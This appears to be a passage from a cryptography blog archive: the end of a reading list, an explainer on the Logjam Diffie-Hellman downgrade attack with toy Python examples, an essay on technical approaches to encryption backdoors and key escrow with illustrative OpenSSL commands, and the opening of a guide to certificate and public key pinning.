  10. Coron, Patarin, Seurin: The random oracle model and the ideal cipher model are equivalent

  11. Bellare, Canetti, Krawczyk: HMAC

Symmetric Crypto

  1. Bellare, Namprempre: Authenticated encryption, generic composition

  2. Ferguson: Authentication weaknesses in GCM.  McGrew, Viega: Response & Update.

Public Key Crypto

  1. Bleichenbacher: CCA Attacks against Protocols (SSL) based on PKCS #1

  2. Bellare, Rogaway: Optimal Asymmetric Encryption Padding (OAEP)

  3. Manger: CCA Attacks against Implementations of OAEP

  4. Bernstein: An Introduction to Post-Quantum Cryptography

Random Number Generation

  1. Dorrendorf, Gutterman, Pinkas: RNG Weaknesses in Windows 2000

  2. Gutterman, Pinkas: Flaws in the Linux RNG

  3. Barker, Kelsey: NIST Special Pub. 800-90: Recommendations for PRNGs

  4. Kelsey, Schneier, Wagner, Hall: Cryptanalytic attacks on PRNGs

  5. Schoenmakers, Sidorenko: Dual EC not kosher

  6. Shumow, Ferguson: There May Be a Backdoor in Dual EC.

  7. Keller: ANSI X9.31 (Block cipher-based PRNG). Various artists: FIPS 186-2 (see Appendix 3)

Implementation Issues

  1. Gutmann: Lessons Learned in Implementing and Deploying Crypto Software

  2. Berson: Security Evaluation of Skype (2005, conducted at Skype’s request)

  3. Biondi, Desclaux: Silver Needle in the Skype (2006, REing of Skype binary)

Financial Services

  1. Berkman, Ostrovsky: The Unbearable Lightness of PIN cracking

  2. Bond, Zieliński: Decimalisation table attacks for PIN cracking

  3. Murdoch, Drimer, Anderson, Bond: Chip and PIN is Broken

RFID and Wireless

  1. Nohl, Evans, Starbug, Plötz: Reverse-Engineering a Cryptographic RFID Tag

  2. Bono, Green, Stubblefield, Juels, Rubin, Szydlo: Security Analysis of TI DST Tags

Misc.

  1. Halperin et al.: Pacemakers and ICDs (no crypto)

  2. Ellis: Non-secret Encryption (historically very interesting)

  3. TheGrugq: Opsec for Freedom Fighters

The Logjam Attack


In case you haven’t heard, there’s a new SSL/TLS vulnerability making the rounds. Nicknamed Logjam, the new attack is ‘special’ in that it may admit complete decryption or hijacking of any TLS connection you make to an improperly configured web or mail server. Worse, there’s at least circumstantial evidence that similar (and more powerful) attacks might already be in the toolkit of some state-level attackers such as the NSA.

This work is the result of an unusual collaboration between a fantastic group of co-authors spread all around the world, including institutions such as the University of Michigan, INRIA Paris-Rocquencourt, INRIA Paris-Nancy, Microsoft Research, Johns Hopkins and the University Of Pennsylvania. It’s rare to see this level of collaboration between groups with so many different areas of expertise, and I hope to see a lot more like it. (Disclosure: I am one of the authors.)

The absolute best way to understand the Logjam result is to read the technical research paper. This post is mainly aimed at people who want a slightly less technical form. For those with even shorter attention spans, here’s the TL;DR:

It appears that the Diffie-Hellman protocol, as currently deployed in SSL/TLS, may be vulnerable to a serious downgrade attack that restores it to 1990s "export" levels of security, and offers a practical "break" of the TLS protocol against poorly configured servers. Even worse, extrapolation of the attack requirements — combined with evidence from the Snowden documents — provides some reason to speculate that a similar attack could be leveraged against protocols (including TLS, IPSec/IKE and SSH) using 768- and 1024-bit Diffie-Hellman.

I’m going to tackle this post in the usual ‘fun’ question-and-answer format I save for this sort of thing.

What is Diffie-Hellman and why should I care about TLS “export” ciphersuites?

Diffie-Hellman is probably the most famous public key cryptosystem ever invented. Publicly discovered by Whit Diffie and Martin Hellman in the 1970s (and a few years earlier, in secret, by UK GCHQ), it allows two parties to negotiate a shared encryption key over a public connection.

Diffie-Hellman is used extensively in protocols such as SSL/TLS and IPSec, which rely on it to establish the symmetric keys that are used to transport data. To do this, both parties must agree on a set of parameters to use for the key exchange. In traditional (‘mod p‘) Diffie-Hellman, these parameters consist of a large prime number p, as well as a ‘generator’ g. The two parties now exchange keys as shown below:

Classical Diffie-Hellman (source).
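
For concreteness, the exchange can be summarized in a few lines of Python (toy parameters only; real deployments use standardized groups with p of 2048 bits or more):

import secrets

p = 2**127 - 1      # a Mersenne prime; a toy modulus, far too small for real use
g = 5               # the 'generator'

a = secrets.randbelow(p - 2) + 1    # Alice's secret exponent (the server, in TLS DHE)
b = secrets.randbelow(p - 2) + 1    # Bob's secret exponent (the client)

A = pow(g, a, p)    # Alice -> Bob:  g^a mod p (signed in the ServerKeyExchange for TLS)
B = pow(g, b, p)    # Bob -> Alice:  g^b mod p

# both sides derive the same shared secret without ever transmitting a or b
assert pow(B, a, p) == pow(A, b, p)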

TLS supports several variants of Diffie-Hellman. The one we're interested in for this work is the 'ephemeral' non-elliptic ("DHE") protocol variant, which works in a manner that's nearly identical to the diagram above. The server takes the role of Alice, selecting (p, g, g^a mod p) and signing this tuple (and some nonces) using its long-term signing key. The client responds with g^b mod p and the two sides then calculate a shared secret.

Just for fun, TLS also supports an obsolete ‘export’ variant of Diffie-Hellman. These export ciphersuites are a relic from the 1990s when it was illegal to ship strong encryption out of the country. What you need to know about “export DHE” is simple: it works identically to standard DHE, but limits the size of p to 512 bits. Oh yes, and it’s still out there today. Because the Internet.

How do you attack Diffie-Hellman?

The best known attack against a correct Diffie-Hellman implementation involves capturing the value g^a mod p and solving to find the secret key a. The problem of finding this value is known as the discrete logarithm problem, and it's thought to be mathematically intractable, at least when Diffie-Hellman is implemented in cryptographically strong groups (e.g., when p is of size 2048 bits or more).

Unfortunately, the story changes dramatically when p is relatively small — for example, 512 bits in length. Given a value g^a mod p for a 512-bit p, it should at least be possible to efficiently recover the secret a and read traffic on the connection.

Most TLS servers don’t use 512-bit primes, so who cares?

The good news here is that weak Diffie-Hellman parameters are almost never used purposely on the Internet. Only a trivial fraction of the SSL/TLS servers out there today will organically negotiate 512-bit Diffie-Hellman. For the most part these are crappy embedded devices such as routers and video-conferencing gateways.
However, there is a second class of servers that are capable of supporting 512-bit Diffie-Hellman when clients request it, using a special mode called the 'export DHE' ciphersuite. Disgustingly, these servers amount to about 8% of the Alexa top million sites (and a whopping 29% of SMTP/STARTTLS mail servers). Thankfully, most decent clients (AKA popular browsers) won't willingly negotiate 'export-DHE', so this would also seem to be a dead end.
It isn’t.
ServerKeyExchange message (RFC 5246)
You see, before SSL/TLS peers can start engaging in all this fancy cryptography, they first need to decide which ciphers they’re going to use. This is done through a negotiation process in which the client proposes some options (e.g., RSA, DHE, DHE-EXPORT), and the server picks one.

This all sounds simple enough. However, one of the early, well known flaws in SSL/TLS is the protocol's failure to properly authenticate these 'negotiation' messages. In very early versions of SSL they were not authenticated at all. SSLv3 and TLS tacked on an authentication process — but one that takes place only at the end of the handshake.*

This is particularly unfortunate given that TLS servers often have the ability to authenticate their messages using digital signatures, but don’t really take advantage of this. For example, when two parties negotiate Diffie-Hellman, the parameters sent by the server are transmitted within a signed message called the ServerKeyExchange (shown at right). The signed portion of this message covers the parameters, but neglects to include any information about which ciphersuite the server thinks it’s negotiating. If you remember that the only difference between DHE and DHE-EXPORT is the size of the parameters the server sends down, you might start to see the problem.

Here it is in a nutshell: if the server supports DHE-EXPORT, the attacker can 'edit' the negotiation messages sent from the client — even if the client doesn't support export DHE — replacing the client's list of supported ciphers with only export DHE. The server will in turn send back a signed 512-bit export-grade Diffie-Hellman tuple, which the client will blindly accept — because it doesn't realize that the server is negotiating the export version of the ciphersuite. From its perspective this message looks just like 'standard' Diffie-Hellman with really crappy parameters.

Overview of the Logjam active attack (source: paper).

All this tampering should run into a huge snag at the end of the handshake, when the client and server exchange Finished messages that include a MAC of the transcript. At this point the client should learn that something funny is going on, i.e., that what it sent no longer matches what the server is seeing. However, the loophole is this: if the attacker can recover the Diffie-Hellman secret quickly — before the handshake ends — she can forge her own Finished messages. In that case the client and server will be none the wiser.

The upshot is that executing this attack requires the ability to solve a 512-bit discrete logarithm before the client and server exchange Finished messages. That seems like a tall order.

Can you really solve a discrete logarithm before a TLS handshake times out?

In practice, the fastest route to solving the discrete logarithm in finite fields is via an algorithm called the Number Field Sieve (NFS). Using NFS to solve a single 512-bit discrete logarithm instance requires several core-years — or about a week of wall-clock time given a few thousand cores — which would seem to rule out solving discrete logs in real time.

However, there is a complication. In practice, NFS can actually be broken up into two different steps:

  1. Pre-computation (for a given prime p). This includes the process of polynomial selection, sieving, and linear algebra, all of which depend only on p. The output of this stage is a table for use in the second stage.
  2. Solving to find a (for a given g^a mod p). The final stage, called the descent, uses the table from the precomputation. This is the only part of the algorithm that actually involves a specific g and g^a.
The important thing to know is that the first stage of the attack consumes the vast majority of the time, up to a full week on a large-scale compute cluster. The descent stage, on the other hand, requires only a few core-minutes. Thus the attack cost depends primarily on where the server gets its Diffie-Hellman parameters from. The best case for an attacker is when p is hard-coded into the server software and used across millions of machines. The worst case is when p is re-generated routinely by the server.
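
To get a feel for the precompute-then-descend structure, here is a toy analogue using baby-step/giant-step rather than NFS; the real attack is far more sophisticated, but the shape is the same, namely an expensive table that depends only on the group parameters followed by a cheap per-target step:

import math

p, g = 101, 2                              # toy group; the real attack targets 512-bit p
m = int(math.sqrt(p - 1)) + 1

# 'precomputation': depends only on (p, g), reusable against every connection
baby_table = {pow(g, j, p): j for j in range(m)}
giant_step = pow(g, (p - 2) * m, p)        # g^(-m) mod p, via Fermat's little theorem

def descent(target):
    # 'descent': quickly recovers a from a specific g^a mod p using the table
    gamma = target
    for i in range(m):
        if gamma in baby_table:
            return i * m + baby_table[gamma]
        gamma = (gamma * giant_step) % p

secret = 57
assert descent(pow(g, secret, p)) == secret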

I’ll let you guess what real TLS servers actually do.
In fact, large-scale Internet scans by the team at the University of Michigan show that most popular web server software tends to re-use a small number of primes across thousands of server instances. This is done because generating prime numbers is scary, so implementers default to using a hard-coded value or a config file supplied by your Linux distribution. The situation for export Diffie-Hellman is particularly awful, with only two (!) primes used across up to 92% of enabled Apache/mod_ssl sites.

Number of seconds to solve a 512-bit discrete log (source: paper).

The upshot of all of this is that about two weeks of pre-computation is sufficient to build a table that allows you to perform the downgrade against most export-enabled servers in just a few minutes (see the chart above). This is fast enough that it can be done before the TLS connection times out. Moreover, even if this is not fast enough, the connection can often be held open longer by using clever protocol tricks, such as sending TLS warning messages to reset the timeout clock.

Keep in mind that none of this shared prime craziness matters when you're using sufficiently large prime numbers (on the order of 2048 bits or more). It's only a practical issue if you're using small primes, like 512-bit, 768-bit or — and here's a sticky one I'll come back to in a minute — 1024-bit.

How do you fix the downgrade to export DHE?

The best and most obvious fix for this problem is to exterminate export ciphersuites from the Internet. Unfortunately, these awful configurations are the default in a number of server software packages (looking at you Postfix), and getting people to update their configurations is surprisingly difficult (see e.g., FREAK).

A simpler fix is to upgrade the major web browsers to resist the attack. The easy way to do this is to enforce a larger minimum size for received DHE keys. The problem here is that the fix itself causes some collateral damage — it will break a small but significant fraction of lousy servers that organically negotiate (non-export) DHE with 512 bit keys.
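
In code, the client-side mitigation amounts to little more than a size check on the parameters the server sends back; a sketch (how you obtain the ServerKeyExchange fields depends entirely on your TLS stack):

def acceptable_dhe_prime(p_bytes, minimum_bits=1024):
    # p_bytes: the server's DH prime from the ServerKeyExchange, as big-endian bytes
    p = int.from_bytes(p_bytes, 'big')
    # a 512-bit export-grade prime fails this check; 2048-bit groups pass comfortably
    return p.bit_length() >= minimum_bits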

The good news here is that the major browsers have decided to break the Internet (a little) rather than allow it to break them. Each has agreed to raise the minimum size limit to at least 768 bits, and some to a minimum of 1024 bits. It’s still not perfect, since 1024-bit DHE may not be cryptographically sound against powerful attackers, but it does address the immediate export attack. In the longer term the question is whether to use larger negotiated DHE groups, or abandon DHE altogether and move to elliptic curves.

What does this mean for larger parameter sizes?

The good news so far is that 512-bit Diffie-Hellman is only used by a fraction of the Internet, even when you account for active downgrade attacks. The vast majority of servers use Diffie-Hellman moduli of length at least 1024 bits. (The widespread use of 1024 is largely due to a hard cap in older Java clients. Go away, Java.)

While 2048-bit moduli are generally believed to be outside of anyone’s reach, 1024-bit DHE has long been considered to be at least within groping range of nation-state attackers. We’ve known this for years, of course, but the practical implications haven’t been quite clear. This paper tries to shine some light on that, using Internet-wide measurements and software/hardware estimates.

If you recall from above, the most critical aspect of the NFS attack is the need to perform large amounts of pre-computation on a given Diffie-Hellman prime p, followed by a relatively short calculation to break any given connection that uses p. At the 512-bit size the pre-computation only requires about a week. The question then is, how much does it cost for a 1024-bit prime, and how common are shared primes?

While there's no exact way to know how much the 1024-bit attack would cost, the paper attempts to provide some extrapolations based on current knowledge. With software, the cost of the pre-computation seems quite high — on the order of 35 million core-years. Making this happen for a given prime within a reasonable amount of time (say, one year) would appear to require billions of dollars of computing equipment if we assume no algorithmic improvements. Even if we rule out such improvements, it's conceivable that this cost might be brought down to a few hundred million dollars using hardware. This doesn't seem out of bounds when you consider leaked NSA cryptanalysis budgets.

What's interesting is that the descent stage, required to break a given Diffie-Hellman connection, is much faster. Based on some implementation experiments by the CADO-NFS team, it may be possible to break a Diffie-Hellman connection in as little as 30 core-days, with parallelization hugely reducing the wall-clock time. This might even make near-real-time decryption of Diffie-Hellman connections practical.

Is the NSA actually doing this?

So far all we’ve noted is that NFS pre-computation is at least potentially feasible when 1024-bit primes are re-used. That doesn’t mean the NSA is actually doing any of it.

There is some evidence, however, that suggests the NSA has decryption capability that’s at least consistent with such a break. This evidence comes from a series of Snowden documents published last winter in Der Spiegel. Together they describe a large-scale effort at NSA and GCHQ, capable of decrypting ‘vast’ amounts of Internet traffic, including IPSec, SSH and HTTPS connections.

NSA slide illustrating exploitation of IPSec encrypted traffic (source: Spiegel).

While the architecture described by the documents mentions attacks against many protocols, the bulk of the energy seems to be around the IPSec and IKE protocols, which are used to establish Virtual Private Networks (VPNs) between individuals and corporate networks such as financial institutions.

The nature of the NSA's exploit is never made clear in the documents, but the diagram above gives a lot of the architectural details. The system involves collecting Internet Key Exchange (IKE) handshakes, transmitting them to the NSA's Cryptanalysis and Exploitation Services (CES) enclave, and feeding them into a decryption system that controls substantial high performance computing resources to process the intercepted exchanges. This is at least circumstantially consistent with Diffie-Hellman cryptanalysis.

Of course it’s entirely possible that the attack is based on a bad random number generator, weak symmetric encryption, or any number of engineered backdoors. There are a few pieces of evidence that militate towards a Diffie-Hellman break, however:

  1. IPSec (or rather, the IKE key exchange) uses Diffie-Hellman for every single connection, meaning that it can’t be broken without some kind of exploit, although this doesn’t rule out the other explanations.
  2. The IKE exchange is particularly vulnerable to pre-computation, since IKE uses a small number of standardized prime numbers called the Oakley groups, which are going on 17 years old now. Large-scale Internet scanning by the Michigan team shows that a majority of responding IPSec endpoints will gladly negotiate using Oakley Group 1 (768 bit) or Group 2 (1024 bit), even when the initiator offers better options.
  3. The NSA’s exploit appears to require the entire IKE handshake as well as any pre-shared key (PSK). These inputs would be necessary for recovery of IKEv1 session keys, but are not required in a break that involves only symmetric cryptography.
  4. The documents explicitly rule out the use of malware, or rather, they show that such malware (‘TAO implants’) is in use — but that malware allows the NSA to bypass the IKE handshake altogether.

I would stipulate that beyond the Internet measurements and computational analysis, this remains firmly in the category of 'crazy-eyed informed speculation'. But while we can't rule out other explanations, this speculation is certainly consistent with a hardware-optimized break of 768- and 1024-bit Diffie-Hellman, along with some collateral damage to SSH and related protocols.

So what next?

The paper gives a detailed set of recommendations on what to do about these downgrade attacks and (relatively) weak DHE groups. The website provides a step-by-step guide for server administrators. In short, probably the best long-term move is to switch to elliptic curves (ECDHE) as soon as possible. Failing this, clients and servers should enforce at least 2048-bit Diffie-Hellman across the Internet. If you can’t do that, stop using common primes.

Making this all happen on anything as complicated as the Internet will probably consume a few dozen person-lifetimes. But it’s something we have to do, and will do, to make the Internet work properly.

Notes:

* There are reasons for this. Some SSL/TLS ciphersuites (such as the RSA encryption-based ciphersuites) don’t use signatures within the protocol, so the only way to authenticate the handshake is to negotiate a ciphersuite, run the key exchange protocol, then use the resulting shared secret to authenticate the negotiation messages after the fact. But SSL/TLS DHE involves digital signatures, so it should be possible to achieve a stronger level of security than this. It’s unfortunate that the protocol does not.

How Do We Build Encryption Backdoors?


They say that history repeats itself, first as tragedy, then as farce. Never has this principle been more apparent than in this new piece by Washington Post reporters Ellen Nakashima and Barton Gellman: ‘As encryption spreads, U.S. grapples with clash between privacy, security‘.

The subject of the piece is a renewed effort by U.S. intelligence and law enforcement agencies to mandate ‘backdoors’ in modern encryption systems. This is ostensibly a reaction to the mass adoption of strong encryption in smartphones, and a general fear that police are about to lose wiretapping capability they’ve come to depend on.

This is not the first time we’ve been here. Back in the 1990s the Federal government went as far as to propose a national standard for ‘escrowed’ telephone encryption called the ‘Clipper’ chip. That effort failed in large part because the technology was terrible, but also because — at least at the time — the idea of ordinary citizens adopting end-to-end encryption was basically science fiction.

Thanks to the advent of smartphones and 'on-by-default' encryption in popular systems like Apple's iMessage and WhatsApp, Americans are finally using end-to-end encryption at large scale, and they seem to like it. This is scaring the bejesus out of the powers that be.

Hence crypto backdoors.

As you might guess, I have serious philosophical objections to the idea of adding backdoors to any encryption system — for excellent reasons I could spend thousands of words on. But I’m not going to do that. What I’d like to do in this post is put aside my own value judgements and try to take these government proposals at face value.

Thus the question I’m going to consider in this post:

Let’s pretend that encryption backdoors are a great idea. From a purely technical point of view, what do we need to do to implement them, and how achievable is it?

First some background.

End-to-end encryption 101

Modern encryption schemes break down into several categories. For the purposes of this discussion we’ll consider two: those systems for which the provider holds the key, and the set of systems where the provider doesn’t.

We're not terribly interested in the first type of encryption, which includes protocols like SSL/TLS and Google Hangouts, since those only protect data at the link layer, i.e., until it reaches your provider's servers. I think it's fairly well established that if Facebook, Apple, Google or Yahoo can access your data, then the government can access it as well — simply by subpoenaing or compelling those companies. We've even seen how this can work.

The encryption systems we're interested in all belong to the second class — protocols where even the provider can't decrypt your information. This includes end-to-end messaging systems such as Apple's iMessage and WhatsApp, as well as on-device encryption of the kind Apple now ships by default.

This seems like a relatively short list, but in practice we're talking about an awful lot of data. The iMessage and WhatsApp systems alone process billions of instant messages every day, and Apple's device encryption is on by default for everyone with a recent(ly updated) iPhone.

How to defeat end-to-end encryption

If you’ve decided to go after end-to-end encryption through legal means, there are a relatively small number of ways to proceed.

By far the simplest is to simply ban end-to-end crypto altogether, or to mandate weak encryption. There’s some precedent for this: throughout the 1990s, the NSA forced U.S. companies to ship ‘export‘ grade encryption that was billed as being good enough for commercial use, but weak enough for governments to attack. The problem with this strategy is that attacks only get better — but legacy crypto never dies.

Fortunately for this discussion, we have some parameters to work with. One of these is that Washington seems to genuinely want to avoid dictating technological designs to Silicon Valley. More importantly, President Obama himself has stated that “there’s no scenario in which we don’t want really strong encryption“. Taking these statements at face value should mean that we can exclude outright crypto bans, mandated designs, and any modification that has the effect of fundamentally weakening encryption against outside attackers.

If we mix this all together, we’re left with only two real options:

  1. Attacks on key distribution. In systems that depend on centralized, provider-operated key servers, such as WhatsApp, Facetime, Signal and iMessage,** governments can force providers to distribute illegitimate public keys, or register shadow devices to a user’s account. This is essentially a man-in-the-middle attack on encrypted communication systems.
  2. Key escrow. Just about any encryption scheme can be modified to encrypt a copy of a decryption (or session) key such that a ‘master keyholder’ (e.g., Apple, or the U.S. government) can still decrypt. A major advantage is that this works even for device encryption systems, which have no key servers to suborn.

Each approach requires some modifications to clients, servers or other components of the system.

Attacking key distribution

Key lookup request for Apple iMessage. The phone number is shown at top right, and the response at bottom left.

Many end-to-end encrypted messaging systems, including WhatsApp and iMessage, generate a long-term public and secret keypair for every device you own. The public portion of this keypair is distributed to anyone who might want to send you messages. The secret key never leaves the device.

Before you can initiate a connection with your intended recipient, you first have to obtain a copy of the recipient’s public key. This is commonly handled using a key server that’s operated by the provider. The key server may hand back one, or multiple public keys (depending on how many devices you’ve registered). As long as those keys all legitimately belong to your intended recipient, everything works fine.

Intercepting messages is possible, however, if the provider is willing to substitute its own public keys — keys for which it (or the government) actually knows the secret half. In theory this is relatively simple — in practice it can be something of a bear, due to the high complexity of protocols such as iMessage.

Key fingerprints.

The main problem with key distribution attacks is — unlike a traditional wiretap — substitute keys are at least in theory detectable by the target. Some communication systems, like Signal, allow users to compare key fingerprints in order to verify that each received the right public key. Others, like iMessage and WhatsApp, don’t offer this technology — but could easily be modified to do so (even using third party clients). Systems like CONIKS may even automate this process in the future — allowing applications to monitor changes to their own keys in real time as they’re distributed by a server.

A final and salient feature of the key distribution approach is that it allows only prospective eavesdropping — that is, law enforcement must first target a particular user, and only then can they eavesdrop on her connections. There’s no way to look backwards in time. I see this as a generally good thing. Others may disagree.

Key Escrow 

Structure of the Clipper ‘LEAF’.

The techniques above don’t help much for systems without public key servers. Moreover, they do nothing for systems that don’t use public keys at all, the prime example being device encryption. In this case, the only real alternative is to mandate some sort of key escrow.

Abstractly, the purpose of an escrow system is to place decryption keys on file (‘escrow’ them) with some trusted authority, who can break them out when the need arises. In practice it’s usually a bit more complex.

The first wrinkle is that modern encryption systems often feature many decryption keys, some of which can be derived on-the-fly while the system operates. (Systems such as TextSecure/WhatsApp actually derive new encryption keys for virtually every message you send.) Users with encrypted devices may change their password from time to time.

To deal with this issue, a preferred approach is to wrap these session keys up (encrypt them) under some master public key generated by the escrow authority — and to store/send the resulting ciphertexts along with the rest of the encrypted data. In the 1990s Clipper specification, these ciphertexts were referred to as Law Enforcement Access Fields, or LEAFs.***

With added LEAFs in your protocol, wiretapping becomes relatively straightforward. Law enforcement simply intercepts the encrypted data — or obtains it from your confiscated device — extracts the LEAFs, and requests that the escrow authority decrypt them. You can find variants of this design dating back to the PGP era. In fact, the whole concept is deceptively simple — provided you don’t go farther than the whiteboard.

Conceptual view of some encrypted data (left) and a LEAF (right).
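To make the flow concrete, here is a minimal sketch of LEAF-style wrapping using nothing but the OpenSSL command line. The file names and the RSA ‘escrow master’ keypair are placeholders, and a real design would need authenticated encryption and serious key management; this only illustrates the wrap-and-recover idea described above.

# Escrow authority: generate the master keypair (placeholder file names)
$ openssl genrsa -out escrow-master.pem 3072
$ openssl rsa -in escrow-master.pem -pubout -out escrow-master-pub.pem

# Sender: pick a random session key, encrypt the message with it, then wrap
# a copy of the session key under the escrow public key (the 'LEAF')
$ openssl rand -hex 32 > session.key
$ openssl enc -aes-256-cbc -pass file:session.key -in message.txt -out message.enc
$ openssl pkeyutl -encrypt -pubin -inkey escrow-master-pub.pem -in session.key -out leaf.bin

# Escrow authority: recover the session key from the LEAF when authorized
$ openssl pkeyutl -decrypt -inkey escrow-master.pem -in leaf.bin -out recovered-session.key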

It’s only when you get into the details of actually implementing key escrow that things get hairy. These schemes require you to alter every protocol in your encryption system, at a pretty fundamental level — in the process creating the mother of all security vulnerabilities — but, more significantly, they force you to think very seriously about who you trust to hold those escrow keys.

Who does hold the keys?

This is the million dollar question for any escrow platform. The Post story devotes much energy to exploring various proposals for doing this.

Escrow key management is make-or-break, since the key server represents a universal vulnerability in any escrowed communication system. In the present debate there appear to be two solutions on the table. The first is to simply dump the problem onto individual providers, who will be responsible for managing their escrow keys — using whatever technological means they deem appropriate. A few companies may get this right. Unfortunately, most companies suck at cryptography, so it seems reasonable to believe that the resulting systems will be quite fragile.

The second approach is for the government to hold the keys themselves. Since the escrow key is too valuable to entrust to one organization, one or more trustworthy U.S. departments would hold ‘shares‘ of the master key, and would cooperate to provide decryption on a case-by-case basis. This was, in fact, the approach proposed for the Clipper chip.

The main problem with this proposal is that it’s non-trivial to implement. If you’re going to split keys across multiple agencies, you have to consider how you’re going to store those keys, and how you’re going to recover them when you need to access someone’s data. The obvious approach — bring the key shares back together at some centralized location — seems quite risky, since the combined master key would be vulnerable in that moment.

A second approach is to use a threshold cryptosystem. Threshold crypto refers to a set of techniques for storing secret keys across multiple locations so that decryption can be done in place without recombining the key shares. This seems like an ideal solution, with only one problem: nobody has deployed threshold cryptosystems at this kind of scale before. In fact, many of the protocols we know of in this area have never even been implemented outside of the research literature. Moreover, it will require governments to precisely specify a set of protocols for tech companies to implement — this seems incompatible with the original goal of letting technologists design their own systems.

Software implementations

A final issue to keep in mind is the complexity of the software we’ll need to make all of this happen. Our encryption software is already so complex that it’s literally at the breaking point. (If you don’t believe me, take a look at OpenSSL’s security advisories for the last year) While adding escrow mechanisms seems relatively straightforward, it will actually require quite a bit of careful coding, something we’re just not good at.

Even if we do go forward with this plan, there are many unanswered questions. How widely can these software implementations be deployed? Will every application maker be forced to use escrow? Will we be required to offer a new set of system APIs in iOS, Windows and Android that we can use to get this right? Answering each of these questions will result in dramatic changes throughout the OS software stack. I don’t envy the poor developers who will have to answer them.

How do we force people to use key escrow?

Leaving aside the technical questions, the real question is: how do you force anyone to do this stuff? Escrow requires breaking changes to most encryption protocols; it’s costly as hell; and it introduces many new security concerns. Moreover, laws outlawing end-to-end encryption software seem destined to run afoul of the First Amendment.

I’m not a lawyer, so don’t take my speculation too seriously — but it seems intuitive to me that any potential legislation will be targeted at service providers, not software vendors or OSS developers. Thus the real leverage for mandating key escrow will apply to the Facebooks and Apples of the world. Your third-party PGP and OTR clients would be left alone, for the tiny percentage of the population who uses these tools.

Unfortunately, even small app developers are increasingly running their own back-end servers these days (e.g., Whisper Systems and Silent Circle) so this is less reassuring than it sounds. Probably the big takeaway for encryption app developers is that it might be good to think about how you’ll function in a world where it’s no longer possible to run your own back-end data transport service — and where other commercial services may not be too friendly to moving your data for you.

In conclusion

If this post has raised more questions than answers, that’s because there really are no answers right now. A serious debate is happening in an environment that’s almost devoid of technical input, at least from technical people who aren’t part of the intelligence establishment.

And maybe that by itself is reason enough to be skeptical.

Notes:

  • Not an endorsement. I have many thoughts on Telegram’s encryption protocols, but they’re beyond the scope of this post.

** Telegram is missing from this list because their protocol doesn’t handle long term keys at all. Every single connection must be validated in person using a graphical key fingerprint, which is, quite frankly, terrible.

*** The Clipper chip used a symmetric encryption algorithm to encrypt the LEAF, which meant that the LEAF decryption key had to be present inside of every consumer device. This was completely nuts, and definitely a bullet dodged. It also meant that every single Clipper had to be implemented in hardware using tamper resistant chip manufacturing technology. It was a truly awful design.

Certificate and Public Key Pinning


Certificate and Public Key Pinning is a technical guide to implementing certificate and public key pinning as discussed at the Virginia chapter’s presentation Securing Wireless Channels in the Mobile Space. This guide is focused on providing clear, simple, actionable guidance for securing the channel in a hostile environment where actors could be malicious and the conference of trust a liability. Additional presentation material included a supplement with code excerpts, an Android sample program, an iOS sample program, a .Net sample program, and an OpenSSL sample program.

A cheat sheet is available at Pinning Cheat Sheet.

Introduction

Secure channels are a cornerstone to users and employees working remotely and on the go. Users and developers expect end-to-end security when sending and receiving data – especially sensitive data on channels protected by VPN, SSL, or TLS. While organizations which control DNS and CA have likely reduced risk to trivial levels under most threat models, users and developers subject to others’ DNS and a public CA hierarchy are exposed to non-trivial amounts of risk. In fact, history has shown those relying on outside services have suffered chronic breaches in their secure channels.

The pandemic abuse of trust has resulted in users, developers and applications making security related decisions on untrusted input. The situation is somewhat of a paradox: entities such as DNS and CAs are trusted and supposed to supply trusted input; yet their input cannot be trusted. Relying on untrusted input for security related decisions is not only bad karma, it violates a number of secure coding principles (see, for example, OWASP’s Injection Theory and Data Validation).

Pinning effectively removes the “conference of trust”. An application which pins a certificate or public key no longer needs to depend on others – such as DNS or CAs – when making security decisions relating to a peer’s identity. For those familiar with SSH, you should realize that public key pinning is nearly identical to SSH’s StrictHostKeyChecking option. SSH had it right the entire time, and the rest of the world is beginning to realize the virtues of directly identifying a host or service by its public key.
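As a quick illustration (the user and host below are placeholders), the OpenSSH client can be told to enforce exactly this behavior:

# Refuse to connect unless the server's key is already pinned in known_hosts
$ ssh -o StrictHostKeyChecking=yes user@host.example.com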

Others who actively engage in pinning include Google and its browser Chrome. Chrome was successful in detecting the DigiNotar compromise which uncovered suspected interception by the Iranian government on its citizens. The initial report of the compromise can be found at Is This MITM Attack to Gmail’s SSL?; and Google Security’s immediate response at An update on attempted man-in-the-middle attacks.

What’s the problem?

Users, developers, and applications expect end-to-end security on their secure channels, but some secure channels are not meeting the expectation. Specifically, channels built using well known protocols such as VPN, SSL, and TLS can be vulnerable to a number of attacks.

Examples of past failures are listed on the discussion tab for this article. This cheat sheet does not attempt to catalogue the failures in the industry, investigate the design flaws in the scaffolding, justify the lack of accountability or liability with the providers, explain the race to the bottom in services, or demystify the collusion between, for example, Browsers and CAs. For additional reading, please visit PKI is Broken and The Internet is Broken.

Patient 0

The original problem was the Key Distribution Problem. Insecure communications can be transformed into a secure communication problem with encryption. Encrypted communications can be transformed into an identity problem with signatures. The identity problem terminates at the key distribution problem. They are the same problem.

The Cures

There are three cures for the key distribution problem. First is to have first hand knowledge of your partner or peer (i.e., a peer, server or service). This could be solved with SneakerNet. Unfortunately, SneakerNet does not scale and cannot be used to solve the key distribution problem.

The second is to rely on others, and it has two variants: (1) web of trust, and (2) hierarchy of trust. Web of Trust and Hierarchy of Trust solve the key distribution problem in a sterile environment. However, Web of Trust and Hierarchy of Trust each requires us to rely on others – or confer trust. In practice, trusting others is proving to be problematic.

What Is Pinning?

Pinning is the process of associating a host with its expected X509 certificate or public key. Once a certificate or public key is known or seen for a host, the certificate or public key is associated or ‘pinned’ to the host. If more than one certificate or public key is acceptable, then the program holds a pinset (a term taken from Jon Larimer and Kenny Root’s Google I/O talk). In this case, the advertised identity must match one of the elements in the pinset.

A host or service’s certificate or public key can be added to an application at development time, or it can be added upon first encountering the certificate or public key. The former – adding at development time – is preferred since preloading the certificate or public key out of band usually means the attacker cannot taint the pin. If the certificate or public key is added upon first encounter, you will be using key continuity. Key continuity can fail if the attacker has a privileged position during the first encounter.

Pinning leverages knowledge of the pre-existing relationship between the user and an organization or service to help make better security related decisions. Because you already have information on the server or service, you don’t need to rely on generalized mechanisms meant to solve the key distribution problem. That is, you don’t need to turn to DNS for name/address mappings or CAs for bindings and status. One exception is revocation and it is discussed below in Pinning Gaps.

It is also worth mentioning that Pinning is not Stapling. Stapling sends both the certificate and OCSP responder information in the same request to avoid the additional fetches the client should perform during path validations.

When Do You Pin?

You should pin anytime you want to be relatively certain of the remote host’s identity or when operating in a hostile environment. Since one or both are almost always true, you should probably pin all the time.

